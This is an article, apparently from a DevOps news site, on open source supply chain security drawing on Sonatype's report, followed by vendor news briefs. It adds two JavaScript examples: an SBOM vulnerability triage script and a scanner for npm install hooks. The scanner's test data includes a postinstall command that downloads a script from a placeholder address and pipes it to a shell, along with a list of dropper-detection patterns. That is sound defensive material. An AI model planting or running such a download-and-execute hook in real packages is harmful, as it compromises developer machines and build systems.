Check Point® Software Technologies Ltd. announced that its Quantum Firewall Software R82 — the latest version of Check Point’s core network security software delivering advanced threat prevention and scalable policy management — has received Common Criteria EAL4+ certification, further reinforcing its position as a trusted security foundation for critical infrastructure, government, and defense organizations worldwide.
The explosion of open source software consumption, combined with the increasing backlog of critical vulnerabilities and the rise of outside threats, paints an alarming picture of the current state of software supply chain security. Sonatype's State of the Software Supply Chain Report highlights the biggest issues plaguing development teams, revealing how cyber attacks are evolving and emphasizing the need for better defense.
The Current Software Supply Chain Security Landscape
Open source is experiencing unprecedented growth, with an estimated 6.6 trillion downloads of open source packages by the end of 2024. This surge in consumption also brings a host of new threats. With open source accounting for up to 90% of modern software applications, the software supply chain has become a primary target for attackers. The JavaScript ecosystem, for example, saw a 70% year-over-year increase in package requests and, over the same period, a 156% year-over-year increase in malicious packages, with more than 512,847 malicious packages identified in the past year alone.
This is just one example of the urgent need for better risk mitigation in software development. The persistent risk has two causes. First, open source components are selected and managed without discipline: although updated versions are available for over 99% of packages, 80% of application dependencies go un-upgraded for more than a year, and when a vulnerable component is consumed, a fixed version already exists 95% of the time. Second, traditional scanning tools and endpoint security products cannot detect newly published open source malware, which has no signature yet precisely because it is new and which typically executes as soon as the package is installed, so DevOps teams often are not aware they are at risk until the malware is already present in their build environments.
As threats continue to increase, organizations must mitigate them proactively. This starts with developers adopting a "security-first" mindset, one that prioritizes responsible dependency management, leverages advanced tools and focuses on earlier intervention. Doing so is the only way to minimize risk before it's too late.
The Need For Proactive Dependency Management
Organizations must prioritize proactive dependency management, high-quality component selection and vigilance against vulnerabilities to mitigate escalating risks. A Software Bill of Materials (SBOM) is an essential tool in this approach: it is a machine-readable inventory of every component in a piece of software, transitive dependencies included, so that when a new vulnerability is disclosed an organization can immediately tell which applications contain the affected component and version instead of rediscovering its dependency tree under pressure. Projects that use an SBOM to manage open source dependencies fix vulnerabilities 264 days faster than those that do not.
However, despite the rise in SBOM usage, it is not keeping pace with the influx of new components being created, highlighting the need for enhanced automation, tooling and support for open source maintainers. In the past year, 60,813 SBOMs were published while 6,971,092 new components were created within the same timeframe, which demonstrates the critical gap in software transparency that exacerbates risks from unmanaged dependencies and persistent vulnerabilities.
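To make concrete how an SBOM shortens the path from disclosure to fix (the 264-day figure above) and how often a fixed version already exists for a vulnerable component (the 95% figure earlier), here is an added example that triages a CycloneDX JSON SBOM against an advisory feed. It is not code from the Sonatype report or from any product mentioned on this page. The SBOM contents, the advisory identifiers (ADV-000x) and the "first fixed version" values are all constructed for illustration; the only real structure assumed is the CycloneDX `components[].purl` field and package-url (purl) syntax.

```javascript
// Added example (not from the Sonatype report or any vendor tool): match a
// CycloneDX SBOM against an advisory feed and report which components are
// affected and whether a fixed version already exists.

// Constructed CycloneDX 1.5 document describing four npm components.
const SBOM = {
  bomFormat: "CycloneDX",
  specVersion: "1.5",
  components: [
    { type: "library", name: "lodash",   version: "4.17.20", purl: "pkg:npm/lodash@4.17.20" },
    { type: "library", name: "minimist", version: "1.2.5",   purl: "pkg:npm/minimist@1.2.5" },
    { type: "library", name: "express",  version: "4.19.2",  purl: "pkg:npm/express@4.19.2" },
    { type: "library", name: "left-pad", version: "1.3.0",   purl: "pkg:npm/left-pad@1.3.0" },
  ],
};

// Constructed advisory feed with hypothetical identifiers (not real CVEs).
// `fixedIn` is the first non-vulnerable version; null means no fix has
// shipped, so every version is affected.
const ADVISORIES = [
  { id: "ADV-0001", purlName: "pkg:npm/lodash",   fixedIn: "4.17.21" },
  { id: "ADV-0002", purlName: "pkg:npm/minimist", fixedIn: "1.2.6" },
  { id: "ADV-0003", purlName: "pkg:npm/express",  fixedIn: "4.17.0" }, // 4.19.2 is already past the fix
  { id: "ADV-0004", purlName: "pkg:npm/left-pad", fixedIn: null },     // affected, no fix available yet
];

// Parse "MAJOR.MINOR.PATCH" (optional leading "v"); pre-release tags are ignored.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v);
  if (!m) throw new Error(`not a semver version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Return -1, 0 or 1 comparing two semver strings numerically, field by field.
function compareSemver(a, b) {
  const x = parseSemver(a), y = parseSemver(b);
  for (let i = 0; i < 3; i++) {
    if (x[i] !== y[i]) return x[i] < y[i] ? -1 : 1;
  }
  return 0;
}

// Split a package-url into its name part and version. purl percent-encodes
// the "@" of scoped npm packages, so the last "@" always separates the version.
function splitPurl(purl) {
  const at = purl.lastIndexOf("@");
  if (at < 0) throw new Error(`purl without version: ${purl}`);
  return { name: purl.slice(0, at), version: purl.slice(at + 1) };
}

// Walk every component in the SBOM and report each advisory that applies.
// Components without a purl are assumed (for this example) to be npm packages.
function triageSbom(sbom, advisories) {
  if (sbom.bomFormat !== "CycloneDX") throw new Error("expected a CycloneDX document");
  const findings = [];
  for (const c of sbom.components || []) {
    const { name, version } = c.purl
      ? splitPurl(c.purl)
      : { name: `pkg:npm/${c.name}`, version: c.version };
    for (const adv of advisories) {
      if (adv.purlName !== name) continue;
      const affected = adv.fixedIn === null || compareSemver(version, adv.fixedIn) < 0;
      if (affected) {
        findings.push({ component: name, version, advisory: adv.id, fixedIn: adv.fixedIn });
      }
    }
  }
  return findings;
}

// Summarize what a response team actually needs: upgrades to schedule now
// versus components that need a mitigation because no fix exists.
function summarize(findings) {
  return {
    upgradeNow: findings.filter(f => f.fixedIn !== null).map(f => `${f.component}: ${f.version} -> ${f.fixedIn}`),
    noFixYet:   findings.filter(f => f.fixedIn === null).map(f => `${f.component}@${f.version} (${f.advisory})`),
  };
}

console.log(JSON.stringify(summarize(triageSbom(SBOM, ADVISORIES)), null, 2));
```

With the constructed data, lodash and minimist land in the "upgrade now" list with a concrete target version, express is skipped because 4.19.2 is already past the fixed version, and left-pad is reported separately as affected with no fix available, which is the case that needs a compensating control rather than a version bump. The same loop runs against every SBOM an organization holds, which is what turns a disclosure into a list of affected applications in minutes rather than a manual dependency audit.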
This gap breeds complacency, a false sense of security under which risk accumulates and threatens the integrity of software supply chains. The rise of open source malware further complicates the landscape, as attackers exploit poor dependency management. Recent malicious npm packages, for example, concealed macOS malware in travis.yml files and deployed binaries disguised as legitimate updates. These incidents show how attackers use public package registries to infiltrate development environments: a malicious package does not even need to be imported by application code, because npm runs a package's install-time lifecycle scripts as soon as it is installed. To secure their environments effectively, software manufacturers must adopt rigorous practices and advanced tooling.
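The install-time execution path is the one a practitioner can check for directly. The following added example, which is not code from the Sonatype report or from any tool mentioned on this page, inspects package.json manifests for npm lifecycle hooks that run during installation and flags command lines that look like droppers. The manifests, the indicator list and the 198.51.100.7 address (a TEST-NET range) are all constructed for illustration; the only real behaviour assumed is that npm executes the `preinstall`, `install`, `postinstall` and `prepare` scripts automatically.

```javascript
// Added example (not from the Sonatype report or any vendor tool): find
// packages that run commands during `npm install` and flag the ones whose
// commands look like install-time droppers. All manifests below are constructed.

// Lifecycle scripts npm executes automatically on install. `prepare` runs for
// local installs and git dependencies; the other three run for registry packages too.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators typical of install-time droppers (a constructed, deliberately
// small list; real tooling uses a much richer set and behavioural analysis).
const INDICATORS = [
  { label: "remote download", re: /\b(curl|wget)\b/ },
  { label: "pipe to shell",   re: /\|\s*(sh|bash)\b/ },
  { label: "base64 payload",  re: /\bbase64\b|\batob\(|Buffer\.from\([^)]*["']base64["']/ },
  { label: "dynamic code",    re: /\beval\(|new Function\(/ },
  { label: "inline node",     re: /\bnode\s+-e\b/ },
  { label: "chmod",           re: /\bchmod\b/ },
];

// Constructed package.json contents. The URL uses a TEST-NET address and is
// not a real indicator of compromise.
const MANIFESTS = {
  "web-app": JSON.stringify({
    name: "web-app", version: "1.0.0",
    scripts: { prepare: "husky install", test: "jest" },
  }),
  "evil-helper": JSON.stringify({
    name: "evil-helper", version: "0.0.3",
    scripts: { postinstall: "curl -s http://198.51.100.7/u | sh", test: "echo ok" },
  }),
  "tiny-util": JSON.stringify({
    name: "tiny-util", version: "2.1.0",
    scripts: { build: "tsc", test: "vitest" },
  }),
};

// Inspect one manifest and return every install-time hook it declares,
// with the indicator labels that matched its command line.
function scanManifest(pkgJsonText) {
  const pkg = JSON.parse(pkgJsonText);
  const scripts = pkg.scripts || {};
  const hooks = [];
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = scripts[hook];
    const reasons = INDICATORS.filter(ind => ind.re.test(command)).map(ind => ind.label);
    hooks.push({ hook, command, reasons });
  }
  return { name: pkg.name, hooks };
}

// Policy: any matched indicator blocks the package; an install hook with no
// indicator still needs a human look (it runs arbitrary code); else clean.
function verdictFor(scan) {
  if (scan.hooks.some(h => h.reasons.length > 0)) return "block";
  if (scan.hooks.length > 0) return "review";
  return "clean";
}

// Scan a map of package name -> package.json text and return a report.
function scanAll(manifests) {
  const report = {};
  for (const [name, text] of Object.entries(manifests)) {
    const scan = scanManifest(text);
    report[name] = { verdict: verdictFor(scan), hooks: scan.hooks };
  }
  return report;
}

for (const [name, r] of Object.entries(scanAll(MANIFESTS))) {
  const detail = r.hooks.map(h => `${h.hook} [${h.reasons.join(", ")}]`).join("; ");
  console.log(`${name}: ${r.verdict}${detail ? " (" + detail + ")" : ""}`);
}
```

The point of the "review" verdict is that a lifecycle hook is arbitrary code execution on every developer workstation and build agent that installs the package, whether or not the command line matches a pattern; pattern matching only prioritizes. The coarse but reliable mitigation is npm's `ignore-scripts` setting (`npm config set ignore-scripts true`, or `npm install --ignore-scripts`), which stops all of these hooks from running and forces the packages that genuinely need a build step to be handled explicitly.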
Best Practices for Reliable Dependency Management
Despite the increasing challenges, there is a light at the end of the tunnel. While not a silver bullet, proactive dependency management can reduce many of these risks if a few best practices are followed:
■ Focus on High-Quality Components: Prioritize high-quality open source components. Projects supported by recognized foundations exhibit better security practices and fewer vulnerabilities.
■ Leverage Intelligent Software Composition Analysis (SCA): Implementing intelligent SCA tools can enhance developer efficiency and risk management without altering workflows.
■ Utilize Automation to Enhance Collaboration and Save Developer Time: Implement scalable automation for dependency management to reduce conflicts between security and engineering teams, freeing up to 5% of engineering capacity. By updating components only when necessary, automation minimizes false positives, reduces noise and saves valuable developer time.
■ Integrate Advanced Reachability Analysis: Combining reliable automation with advanced reachability analysis empowers developers to produce high-quality software more quickly. This approach enables security teams to focus on actionable vulnerabilities, further enhancing overall security.
■ Make SBOM Practices Standard: Implementing SBOMs as a core practice provides visibility into software components, essential for quickly identifying and remediating vulnerabilities. Organizations should treat SBOM management as a fundamental part of their security protocols.
By prioritizing better dependency management, organizations can significantly improve their security posture and operational efficiency, ensuring they remain competitive and resilient against evolving threats to the software supply chain.
Industry News
Postman announced full support for the Model Context Protocol (MCP), helping users build better AI Agents, faster.
Opsera announced new Advanced Security Dashboard capabilities available as an extension of Opsera's Unified Insights for GitHub Copilot.
Lineaje launched new capabilities including Lineaje agentic AI-powered self-healing agents that autonomously secure open-source software, source code and containers, Gold Open Source Packages and Gold Open Source Images that enable organizations to source trusted, pre-fixed open-source software, and a software crawling and analysis engine, SCA360, that discovers and contextualizes risks at all software development stages.
Check Point® Software Technologies Ltd. launched its inaugural AI Security Report at RSA Conference 2025.
Lenses.io announced the release of Lenses 6.0, enabling organizations to modernize applications and systems with real-time data as AI adoption accelerates.
Sonata Software has achieved Amazon Web Services (AWS) DevOps Competency status.
vFunction® announced significant platform advancements that reduce complexity across the architectural spectrum and target the growing disconnect between development speed and architectural integrity.
Sonatype® introduced major enhancements to Repository Firewall that expand proactive malware protection across the enterprise — from developer workstations to the network edge.
Aqua Security introduced Secure AI, full lifecycle security from code to cloud to prompt.
Salt Security announced the launch of the Salt Model Context Protocol (MCP) Server, giving enterprise teams a novel access point of interaction with their API infrastructure, leveraging natural language and artificial intelligence (AI).
The Cloud Native Computing Foundation® (CNCF®), which builds sustainable ecosystems for cloud native software, announced the graduation of in-toto, a software supply chain security framework developed at the NYU Tandon School of Engineering.
SnapLogic announced the launch of its next-generation API management (APIM) solution, helping organizations accelerate their journey to a composable and agentic enterprise.
Apiiro announced Software Graph Visualization, an interactive map that enables users to visualize their software architectures across all components, vulnerabilities, toxic combinations, blast radius, data exposure and material changes in real time.
Check Point® Software Technologies Ltd. and Illumio, the breach containment company, announced a strategic partnership to help organizations strengthen security and advance their Zero Trust posture.